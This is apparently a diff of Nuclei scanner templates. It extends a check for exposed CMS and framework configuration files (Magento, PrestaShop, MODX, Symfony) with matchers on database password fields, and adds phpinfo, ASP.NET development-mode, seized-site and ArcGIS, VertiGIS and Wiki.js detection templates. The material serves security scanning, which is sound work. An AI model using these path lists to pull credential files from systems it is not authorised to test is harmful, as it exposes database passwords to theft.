- /app/etc/env.php # magento
- /app/etc/env.php # magento 2
- /app/etc/local.xml # magento 1
- /Application/Common/Conf/config.php # thinkphp
- /environments/dev/common/config/main-local.php # yii
- /environments/prod/common/config/main-local.php # yii
@ -45,12 +46,13 @@ http:
- /e/config/config.php # empirecms
- /data/sql_config.php # phpwind
- /data/bbscache/config.php # phpwind
- /app/config/parameters.yml # prestashop 1.7
- /app/config/parameters.php # prestashop 1.7
- /app/config/parameters.yml # prestashop 1.7,1.8
- /app/config/parameters.php # prestashop 1.7,1.8
- /config/settings.inc.php # prestashop > 1.5,1.6
- /config/settings.old.php # prestashop > 1.5,1.6
- /manager/includes/config.inc.php # MODX CMS
- /app/config/parameters.ini # Symfony
- /phinx.yml # CS-Cart
- /db.php
- /conn.php
- /database.php
@ -128,6 +130,7 @@ http:
- "'DBPASS'"
- "database_type"
- "define('DB"
- "environments:"
condition: or
- type: word
@ -136,4 +139,4 @@ http:
- "text/plain"
- "bytes"
condition: or
# digest: 4a0a00473045022100db91bbd31e8e87d2ebc0e02533e20d9c5038e5edf2f8317ce5f7cda82d2cef3c022017e9ec02dd29af995e30c9539ad7fbd013746964cf25e5f6a43cc03db38c7184:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e5bab6ebb480d24867072237be9b1280aae96f307c09497dd04a663c45ee57010221009ea7575d866bca25b3b5476bb734f0e48e4492b1e13f08906914483dcee4b352:922c64590222798bb761d5b6d8e72950

View File

@ -27,6 +27,7 @@ http:
- "/php_info.php"
- "/test.php"
- "/i.php"
- "/a.php"
- "/p.php"
- "/pi.php"
- "/asdf.php"
@ -67,4 +68,4 @@ http:
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 490a0046304402206ad6f443ffbaace771aec5f22f010b026d133fb7ffa59fff136813d63f853da502200cdd41c804a2ce73444bdc4494fe0e82c8c728b2a092c2d223661ed083fe7ffa:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207abcbc13ec5b9284e67a831e54e5a987cb3641c78280bf59e6d18084ecf1a872022035e8ebcffb3074c0dd3a8b07d814f25d57645b748c3c33ef12195e2dbcf51daf:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,30 @@
id: seized-site
info:
name: Seized Site
author: rxerium
severity: info
description: This website has been seized by law enforcement
metadata:
max-request: 1
verified: true
shodan-query: title:"THIS WEBSITE HAS BEEN SEIZED"
tags: seized,miscellaneous
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "THIS WEBSITE HAS BEEN SEIZED"
case-insensitive: true
- type: status
status:
- 200
# digest: 4b0a00483046022100b67d56fde473d15dd884b06359a0ab984362718cd7700fc85044fee004048703022100d2e8940287f6c688b7f4284bb68e3e9fdb82909832f7572c2ec5582deb2483dd:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,41 @@
id: aspnetcore-dev-env
info:
name: ASP.NET Core Development Environment - Exposure
author: Mys7ic
severity: info
description: |
The ASP.NET Core application is running in Development mode, which could exposes detailed error messages and stack traces on the '/Error' page.
impact: |
Exposing detailed error messages and stack traces can reveal sensitive information such as server configurations, file paths, source code snippets, and other debug information. Attackers can use this information to identify vulnerabilities and compromise the application or underlying systems.
remediation: |
Set the 'ASPNETCORE_ENVIRONMENT' environment variable to 'Production' and ensure that detailed error messages are not exposed to end-users.
reference:
- https://docs.microsoft.com/en-us/aspnet/core/fundamentals/environments
metadata:
max-request: 1
vendor: microsoft
product: asp.net-core
shodan-query: html:"ASPNETCORE_ENVIRONMENT"
verified: true
tags: misconfig,aspnetcore,exposure
http:
- method: GET
path:
- "{{BaseURL}}/Error"
matchers-condition: or
matchers:
- type: word
part: body
words:
- "<strong>ASPNETCORE_ENVIRONMENT</strong> environment variable to <strong>Development</strong>"
- type: word
part: body
words:
- "ASPNETCORE_ENVIRONMENT"
- "<environment include=\"Development\">"
condition: and
# digest: 490a0046304402202067b5f6070703eaccb234d9fadb99bbfd78c2791b0073c494f498788060e8c00220755457d24f6d89d0f60a1cb5227c29412c43da39da4fb7c53c17460ecd6b2f81:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,41 @@
id: arcgis-detect
info:
name: ArcGIS - Detect
author: righettod
severity: info
description: |
ArcGIS products was detected.
reference:
- https://enterprise.arcgis.com/en/
metadata:
verified: true
max-request: 5
shodan-query: http.title:"ArcGIS"
tags: tech,arcgis,detect
http:
- method: GET
path:
- "{{BaseURL}}/portal/sharing/rest"
- "{{BaseURL}}/portal/portalhelp/en/rest/"
- "{{BaseURL}}/arcgis/rest/services"
- "{{BaseURL}}/server/rest/services"
- "{{BaseURL}}/arcgis/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>arcgis portal directory", "search arcgis enterprise help", "<title>arcgis</title>", "arcgis rest services directory", "<title>arcgis hub</title>")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)&copy;\s+([0-9]+)\s+Esri\.'
- '<b>Current\s+Version:\s+<\/b>([0-9.]+)'
# digest: 4b0a00483046022100cfc6b37f92c5bc0f1e2f5d161b213cf2deaeff3ec48760367a83dd184b941c4002210090ab8d8a7608f7094b6081abbae5bbb122e798b1d46932226bd7aa86a991e1b1:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,37 @@
id: vertigis-detect
info:
name: VertiGIS - Detect
author: righettod
severity: info
description: |
VertiGIS products was detected.
reference:
- https://www.vertigis.com/
metadata:
verified: true
max-request: 9
shodan-query: http.title:"vertigis"
tags: tech,vertigis,detect
http:
- method: GET
path:
- "{{BaseURL}}/login"
- "{{BaseURL}}/GeoManLogin.aspx"
- "{{BaseURL}}/FM/GeoManLogin.aspx"
- "{{BaseURL}}/GEBman/GeoManLogin.aspx"
- "{{BaseURL}}/Geoportal/synserver"
- "{{BaseURL}}/vertigisstudio/web/designer/locales/en/translations.json"
- "{{BaseURL}}/vertigisstudio/search/designer/locales/en/translations.json"
- "{{BaseURL}}/vertigisstudio/mobile/designer/locales/en/translations.json"
- "{{BaseURL}}/vertigisstudio/accesscontrol/locales/en/translations.json"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>vertigis", "welcome to vertigis", "vertigis fm - login", "<title>weboffice landing page" , "vertigis studio app designer", "vertigis studio web designer", "vertigis studio access control")'
condition: and
# digest: 480a004530430220728fab9b9be85ae3eb96334a3bd2f3d785aa589e1602e0e6bf619a67e845b725021f0f99ad41dc052d253acff6be795a91b24f9a6f1ecbe26a38c851eda04078d6:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,28 @@
id: wiki-js-detect
info:
name: Wiki.js - Detect
author: righettod
severity: info
description: |
Wiki.js was detected.
reference:
- https://js.wiki/
metadata:
verified: true
max-request: 1
shodan-query: http.html:"wiki.js"
tags: tech,wiki-js,detect
http:
- method: GET
path:
- "{{BaseURL}}/_assets/js/app.js"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(to_lower(body), "wiki.js - wiki.js.org", "window.wiki")'
condition: and
# digest: 490a00463044022001a724774fd5edf512cecc0776374a7fe5dd50c53ae8c0fa9967bfe6fbbd299c02201363f742a5f7cff6393c7d7f704f808f73e20b3187b97ff420def6a38fa92cc8:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022014e1b67585f773aa8823a2a0e9c86efd76c2746e4b694c418332b8ffbe03225202205a67e8d9f2f1a045a6205395cb1185647e7d32096127617c3819aadad2295e9f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a2e6208eb6898929b4940406a73be24ad394bd48137088925a88983bb7eb6acf022100e6c1831250d3329369639af046a432c299906eda323729782f5dc1fdd5980bb8:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220038ebdaa2949853c990914fb4859d5126f6feae0142656cf74c5e3bed94efb1a022100f6610f110d5fb91503933ea692a31bc0e08e4b448e5a62f247c3eb83980783e4:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100902ce40295dad304d4264cf83d28135ef24a15a6c3dc8b59bec05a0631997d9902205a2cb0e2ca64fdac8fa848be3c24f51d872490867d36e6932bd5fb180d8dd46b:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ff37174eb28853bb25779e9348811fc4c8d04b2328c0dc774c46b3fffecd6afc022043c23e790d7ad8f428c51e6cad760e7c5058dc86c894bb684470ac30d859d200:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c5c13c5c593bcaa2087f5c6b5aea54eb8f5164fb4fa6e287cac7c083e92cb717022073c9cb366b3515a964081a87b770221cf092228a9bedc91bb9e39596b504b746:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205e295026d9d2ebd9e709dc3597b89f0aadcb3bb514e359ffd761ddea81ac3d52022061b5ac4098976cd7ae70feb499fa97e99bb10d742152986761283c30455ce196:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022037869387fd9d587d28adc574786e387f1a101d3424613ec61c47f6569fcc0fbd0220124d98b591384e96fd1a17aa414d7f17162c7dd2659ab811cdb38244b02142e3:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a0048304602210086e8f600f8b7779117c807997220656b337b0044c73876868fa63bbaabf0f9f2022100e423ad944a06a0a7a47e6e6b5b4fdc73ca497bcd74ed6068dd019a3a9bfd581a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220782d1e57e0954cb346e8abc1466a099419203034adf9106c2ca94f71b1c908cd02210086623e1a94b58c2f689c02ec04505f06a32bc35d0c3c7bf81ad3b7ec4ea14420:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220035eb7bddbfd74352d94c1264aa2d6fdfe6d127e070e133ff047a84bf1fd22ea02201ac3da23d091584c9b25b05b1a06d80394dbda632ad788b40cd072e555245d4d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100bf9b5e1a9aaf3f1293f8057c32755b093da825570f8fad3add1cde09a3ead87d02200751c2d28307e542bfcad38b1411f263a3f8ee59ca81ece30547df6f9c9ebe57:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100d8d82f3fa8fa3dbc4122933a837881a51a78632e9c8989b92712ba190abc3c28022100e840b14d4091ae71b7bf2511f045853fc561e17f2d958560af1ac4b4874b0fa1:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022055c9aaa55f8c1970f6809542e326e5a72facb2be40778ae15a498c5eb3b50a9f022062a3852fc481d82da79ed72764de1cacca3609aa801d5b7757bc7e7100f65312:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202491a876a44021d979e01ed7086f7b51a560a941c5716fd687572f5166ae8097022044c1aea9ffbb44304b85e2916e22bdfb353883c5bacc98823469888493c58e4e:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220647803b9217690bbcd155de169fd4a54cdab005ae0ea4ce24298755c0dac4e400220550f01fb1853be0c6591e5f52d1c78aa1d00c5392a3cb2e7af1c4408e9bf4b18:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022079b8a22604b492bb01a7f75a666c9311ee23c37ee58b27444655973345693a76022010ff044382a45fe8e429bb83efb5453f956b1b2108e958cd0d77a1960a3364ca:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100930ac5b16c365a55b7947d64b9a5258cd54d8cd7c5abb9e34740d87271117b93022100a6470fe5802a789639f2c0bc2effc7804e8ed17543bfcf61a6c16dbc1e62ac5c:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e23898631caf0dca9a56357ec09b78e146711cd0b5e3e2c9ff91152b7b4a87e702200efc6ad6b32f6482168369c21238da9ad1ff28d009f0ecf5a928c33e2ff275ce:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e686ff76330dfc5f50171a61d0d3646ab3ece1de245f76dbee663525fc58b270022100a99592963fec44e65a58695ab2a339c0dbdc094c91225093f444ace05806f1dd:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f1cab565885db72203adf3bfd83d52053275c22291fa2b4e6175153d2713f8d0022100f19470112e82a0c38b5e8309589367799a242e812c8a57493700135b43d34cd7:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e78ba92eb229e3d94cc34e9efa103f7477196251aced09cfd430b1a673f94cfe0220626c14c52f6599c2db71df9a2440bb59a9093c6416089bc4cee5ab0fa7490a59:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e59f8465618462ad9f3c1459ca0d2ce6de5d643bea4a3e29ef4cad59a9714c5d02203eedcf326065b7ac800e24b2c8449fc13ebad67faa0ec9227a73d5d7150a6506:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220275b0184b2444dc21889a776ac91c8ee85ee77417d48e86e6f4a71be2d1caf00022100802c1dfc837f391e5ff63559e64a79931787ab4ec72ccbc7fa7124ac7619f7ef:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203278119ae6077c597c7edaceb66b6a6c8c8651f8f567466c38d9d1a27747a67d022100b38de48a8d9af192e662ccbc2290b973aeb4395b3aef74d49b465eafc3ca031d:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402203533fbf5221e5a83054e8fe53e9ce52a4674c24a8e4e1a8d9e7615459666061102206ebe610e08008e1f86995958a66ab94bd7c1f478e9988ed880abcceea4c18ec0:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207ed9f88b363faca5ea14bf95a43e7c6adeba43ac5cdae01b8274f9ad72e5f38a02200a8150b2440b14d8511ac3df70096b795f80c0f4833ce008670fa3b924a6d416:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200ef1a1c7e2ab48765a2b09278d303bea73fc623bbf04e6d5b6dc4b3cd03fac5902204c8833861ea21ccf980b303e5fe66a38a00fe12287cf1a347c5d3a673d093d14:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022025ed321a0f6c3c498e81cd731fbdfeed9c00abfcdfa73143c23549e1a6989f2c02203fc103f05e51c85183dc86ed23782747efae5fa64bc18fb5ff4a4d444844ee16:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022024f368719e7614b2c5d16500602080586683362b85f11b4b70f7f1193f53854d022100b91cb38cefc49816ba3a2d9b35569227f48da51fe9fc92181c7001a22c3f9286:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205ab796e909354ce3865621f3e751d70dda174c4b00f390f8dc8bd9466d609dcc022064a60c1b9b67dc608201743f4aa7bfe4bc6fa768c367f732af86b0ed89ca6740:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022061e196fd4035d2573630b3291466e36113bf4f35e489fd06f761709f0c77ec9a02205f59749826baba2f7845485a66fb31c73793713f22d3adc45ba1cb1accb3f98a:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100bbd749cc66421f9785b5cd52a587a43995798964e25c3c36088a107f6363f910022100a561c04853068e94677f6c6c85158942015101f25bed9614cfe672ed60f6911d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100af96e6c03ee7e9313cef314990480e150d4a6d84f86f03d55c97927e5444137b022100fe9e5157c0ef88ee8b9856ae3b870b85467b5a83eec90046b454dacbd7952d48:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207de1487194d93a509ee6e33c1554e3f7e50cce5e226821aebc5e0417fa94dd990221009373223ff2446981321c27dd4c53b9089a0c238d00c93cad37d1480dcbc130c7:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201ef2a9f4a06658475656df0fa59f51536d0ae3e48fbc44f1cbba8fabdcb1f4b3022063437e04ab0c538042d94347f7111e1ddc0bdd487464e87eaffe6c7315134a2a:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100a41c02687e2270c150162eb487d0edc47124d974d569eea359f19466e26833d4022100bf43e794edaf3155adb01a8cf1922975cccfcd01f7f493746ff9661a3ca0f3f8:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100894816eb0cd24993d39d6cb4046e2bdfd9557fdc5e14c92d1787371fcfbac9a702204f30e72f39a5af687fbc48ce25fc44c6b34f5ceefab876982bf735b8dee803fa:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f3d11772d15499e05eced5c6b02ad4535bc772ffe3b11bfeb39804ebe4fa349f02201374f301087c69e438b8ac598bed39291aef5d05bb00233b0ee55f748fe65b11:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022055f24796483fbc5e5b1b9812199f17b70772908a2d3c75eb9248dcc1d18abee502201db08a9742bdb99062fb0390f77f384a8803b85402a83ec9d42875fb90964e6d:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402201458f723dda55154afec7b83d81bd7573aaf9127ae161d1a0f02651939226ab402206c23a9f6fb2ab19161bb80f635d880843ecce3dc749da38894bcfd6e89ffc6bb:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022013ab2df34a25f263388953d0ec625219d327ef2070e554bcb1bb44aa50b31bde02202980ff8c4141e5db2c962c1b5ef2a5b894ca5cba7e778e0aca34de5a906e5846:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e585a7e0b4a9756f61593a6c9a12082ba6904eefb9b0f3a1b7def725b9ab4572022073841cbac806096fc48cbd34f8b5a3b3b9553c11fddd51480f423776aa55ecb1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f71baed2d8950e75565342467a889097db1211fc11ab863cc12e40277e8d339d022001166d185170fd4c0ee05858f4f5bb86798c39374d87d6d8c30aaf01601dae26:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502204644da8134a8cfefae8606eddbbc665dad2cdbef2ffbc4677eb24e0a709ecb9a022100c69fee6501a35f39beabb21ae7edbe4ee2ccd295ea154634fa1f5ce1b32cbc69:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022075c648aea043f42b152b5b2f885802724b6e23f17d2a4d72a262ba8cafd4b4130220339b97357c795cd591dc87aae80222a76d7e2a855b6135ce5d7f4bd15f857560:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022070c82e52acd47c16e239b15f25b4cfebc2a4d3f7b2d62df07cf20d5b059c25d402207cf925c4ceba05669c772e53257005007be080f5a6efc6bd5de1679355661b49:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022053c55b165b61e2f66ac59b33bfe518a7bb36511b7978c6ee6bba88b3fbfd13b7022032811e60a4f3726c746bfbb2f24fc0ed6326d5ac10cbf1e822ea73c7ffd65551:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100874ed825fcd78569ae945970fed4562aba1259d93a2101344afdd3079d169137022074b0f51108692693d3f7a3536a6663970f25c523009283701cd58b1e05a73937:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402202d8861deb18ffd1b18d5b8b58ec1b818c1615a3f95d3ae2e16be9a629f8e4f1002201c3414a67ff9fb0b099fdcc978f135c1f7162dfc24777d88edd44c685f30fcd1:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100fea8c2c4fa61271afda29b54b637856dd83aeb22aacf4023e8e9e9c9445723c8022100fcbc65a35e690783b4c687d3b3263b29051f08bfb1a511419b43bb95f345fbde:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220282dce68f1ea57e8a8f9d614d02cdf67e45601be99c332d13b236dc37a34d5d10220013f283423d38999fd9376911a455a427ad8cf0936a17ea6c76c1c44de1f4c1d:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022024d624c83b6d2374400af959513eb418c426eeba5d731724c018b8bacadfabe20221008cb4f28cc8b22160e670e9343bad5b8d9f28922eb7b02519f460fb2736147654:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100fe47c658afc49c4568c26a68dded41758da227b8071608311cb1f694400acbe302204267a528855adfa3e0ac1935c1cd973aa0c20267640f0d69d1d0683701c35554:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210084a58c2bbd4b8f9f2f4e2894a3b7b8b1a1f8e883944c56fb9b5f822b3081107a02203087666ac8a86aba5a4ff379d5b267afb8afb39d820797a63a25d91ea95c7c48:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206e828836cc4f92ecb7170a15acf849608d5d0ceaf9b43875927bf32dcf177f23022100dbbc37f35c4970d3b7666dfdf01c4d3242376a08dce9fb6307452b9cb3eb0c92:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100d77832d3eb2a1a2ecaa576bc52971e650c85cce10440ea11f81bf7c9f59703db022100a818d16a06e25bef000bac3f2dd89b9b430a84d245bc32dce336cae564e60e0b:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202dbd9e79a42f42c2563785cb9adcaf4a548258962f2790086a9e908e98fbbda9022100b354d5a462e4176f1b7b22843a5fcdef8fc64a101898eda4b9cf297bb98aff05:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e40a074c1b4b0fdec0ddf9e0e37d35a6967b39e4aab4de04bc9e9359bbb2f2e902203979912a604399af10e48cd9d7ec0d0922d4ff2ff2b9278d8a991840db24ef47:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402202544d6202a9ac06cbc072ceca7541cd3d6d6e521f00803e8e1e7751f13dec09d022028a1ef292cd522cba049dfe93e11fb19cb35abe232cf6cd01434a700c48b6fdc:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207269b7e8c285ec1f035e4da9123b107ad6f91a38a1125d7e38ebf762d757147a0220378e6cb529f703ae182ef3be7fb8e26815d5ceeb182fabab7cddcc6edf47167e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022023dc2ffc14c205a0c88b20b778e3bf3fc59592d7f54d3f865e1225621caefe7c022100f43466814d8a21c4164416821354a4c4bf40a1e63d3e9d936db43ebc82734ef2:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220314bafc2309100ff3a04e5ad032deeba13b3143ab7087c57f110fcb2ba3e9f5e022100d8b11ac35bff3cea7da35bc01240da4c0d848e4301be9b78cdb2969f00f98397:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100df5cffee411fb641ffa6adff7cf5433ba7ca4f5316e41e91f509c296974f1659022100f634f3d7a2272970dd5460469e97c60b819232c282269cbecedc7158720cd99d:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221009774fa325f630a1c65e6ebc70d883fa558d22fc4fcb9bbbd24f5748eb194fb09022076f7190e4a953794d7e1b8fbff93e8d7fd72890e8ea30781e213e768c63d8f81:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e227651b3d98f5cce850bf4f5e7b788041f11c8b4d819922913783974f6a28e30220206b6f531ca430374fc2517ba9f56466b54fa97ac705eccc9617754cf9ca2479:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100dd0435f75983014fcedeca22443c752fff89f809143d72b365a125a1f4f8f3f3022100baba68052d63990d34026b4b9d669a8d99e69c158788d6a94c15873ba6222f48:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c6a352e21a996d66b1d39929877395e6a55f488a2e0a367b025f140512c12b0a022100b44284f8fed70643725ac8a74ddb82b21f8a86686a82fbb8c59a39aca1fea458:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f8bce1214fcbb7b0506ff6eff4145d423bfdf99bafac5d994b5aede0b44adb3402206592f09a802949922d575ee41681ef1202e1985ab59209e5d3518425228e3977:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100db0eed895671f444d1fa48c824b59d6cd558df191515c6f36efc016d0a0e9583022100c6537c157e3ea3af76261eea512c2afedb8c043e107554f3beaacd481a113e08:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100bf00f12f208fde44f03fb656388386c728c622196062a39d7dcd89ddbc3e26c0022100b8b5776b084b4a91c0d729d9372cc01c0014640867fe5f20608dfcf80a2b4df9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100af074c8bfdc7905efebac0f53f389af9428c114dfb7d83fce0a792a1a9a10d6a022100a132d0b4ed87bf0563fd80c2c7bb3c4242b801bbf0bd8068ddda4b1d46d65cc8:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204347d1a4219ed36f3a7d9a276aa6c2eb629392661bce1ce3e2999b9534e461a302206db384cdd891a8065154468a1b52ae9386a0581f7db35f083648c5d4ea4f02fb:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201249ce89b4974c6fa84a9fa7c43581c60350c6cef18415f4369cbb8f43d67faf022100b202d9380913e0b6b1ca68528c4aedc4389ea6f6e9dcda46b565d18d275ccfc9:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c2d6c41d9ec8ac6c2a469042e79454e4a5c7ae7744e14873612f1c27d3d6b68d0220036725a5c2ec8c59b435510c13b3b0e6842b775abce7cdf17096a2a59b9c8f8e:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d39a1a996c713b15233ebc1ed4ab6d0aedad348a6dea6a56ca40927822756827022029fcbbf09cc4703e243e83de0e05602137beffd61cce930b8cc005018ddde65e:922c64590222798bb761d5b6d8e72950

View File

@ -46,4 +46,5 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a0048304602210097ab9bf62ff10d0cbbf6818c9e2b4fccfeb3d17f26f8bf0e8cf0fc3277a30d11022100d1c4f5dafdc037c2652fd17f3a5f1f6bdfd4b9e1c1b883a06b59edd5d90401fb:922c64590222798bb761d5b6d8e72950
